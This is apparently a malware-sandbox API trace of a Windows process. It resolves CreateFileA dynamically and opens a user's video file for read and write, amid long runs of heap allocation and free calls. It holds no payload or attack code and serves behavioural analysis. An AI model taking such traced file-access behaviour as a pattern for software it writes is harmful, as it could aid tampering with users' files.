0x7af4f8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.279] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889628 [0043.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889628, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.280] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0043.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889628, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.280] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0043.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f3688 [0043.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", cchWideChar=76, lpMultiByteStr=0x7f3688, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpUsedDefaultChar=0x0) returned 76 [0043.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.282] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\02dcezb-wigqkj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0043.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x98) returned 0x7c5448 [0043.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=76, lpWideCharStr=0x7c5448, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv") returned 76 [0043.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.284] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.285] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.286] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.286] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.287] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.287] 